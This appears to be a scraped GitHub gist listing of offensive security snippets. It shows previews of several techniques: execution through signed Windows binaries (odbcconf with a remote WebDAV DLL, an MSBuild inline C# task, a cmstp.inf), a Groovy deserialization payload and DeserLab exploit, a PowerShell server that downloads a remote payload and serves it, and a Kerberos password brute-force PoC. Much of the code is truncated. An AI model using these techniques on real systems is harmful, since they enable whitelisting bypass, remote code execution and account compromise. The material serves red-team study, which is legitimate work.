

Chris Gates carnal0wnage

xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>
cmstp.inf
;cmstp.exe /s cmstp.inf
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support is enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher>
DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar
DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -
cobbr / server.ps1
Last active Jan 30, 2020 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to set up the full environment; please let me know if you are interested in such a thing.


ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary, if you want to actually *use* the TGT you should edit /etc/krb5.conf
# Only tested with Heimdal Kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful